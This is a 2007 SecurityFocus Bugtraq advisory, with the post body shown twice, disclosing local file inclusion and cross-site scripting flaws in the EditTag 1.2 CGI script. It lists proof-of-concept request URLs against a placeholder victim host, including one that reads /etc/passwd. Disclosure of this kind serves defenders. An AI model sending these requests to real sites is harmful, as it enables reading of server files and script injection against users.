Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Back to list
|
Post reply
Multiple bugs in EditTag
Jan 05 2007 05:26PM
nj hackerz ir
Script: EditTag
Version: 1.2
Author: Greg Billock (dmacewen (at) isn (dot) net [email concealed])
Discoverer: NetJackal (nima_501[4T]yAhoo[D0T]com - nj[4T]hackerz[D0T]ir)
I am sorry for my BAD English.
Description:
1) Local file injection:
An attacker can use edittag.cgi or edittag_mp.cgi (maybe .pl) to inject files (ex. /etc/passwd)
http://www.victim/edittag/edittag.cgi?file=INJECT
http://www.victim/edittag/edittag.pl?file=INJECT
http://www.victim/edittag/edittag_mp.cgi?file=INJECT
http://www.victim/edittag/edittag_mp.pl?file=INJECT
ex. http://www.victim/edittag/edittag_mp.pl?file=/etc/passwd
2)XSS
http://www.victim/edittag/mkpw_mp.cgi?plain=XSS
http://www.victim/edittag/mkpw.pl?plain=XSS
http://www.victim/edittag/mkpw.cgi?plain=XSS
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
Version: 1.2
Author: Greg Billock (dmacewen (at) isn (dot) net [email concealed])
Discoverer: NetJackal (nima_501[4T]yAhoo[D0T]com - nj[4T]hackerz[D0T]ir)
I am sorry for my BAD English.
Description:
1) Local file injection:
An attacker can use edittag.cgi or edittag_mp.cgi (maybe .pl) to inject files (ex. /etc/passwd)
http://www.victim/edittag/edittag.cgi?file=INJECT
http://www.victim/edittag/edittag.pl?file=INJECT
http://www.victim/edittag/edittag_mp.cgi?file=INJECT
http://www.victim/edittag/edittag_mp.pl?file=INJECT
ex. http://www.victim/edittag/edittag_mp.pl?file=/etc/passwd
2)XSS
http://www.victim/edittag/mkpw_mp.cgi?plain=XSS
http://www.victim/edittag/mkpw.pl?plain=XSS
http://www.victim/edittag/mkpw.cgi?plain=XSS
[ reply ]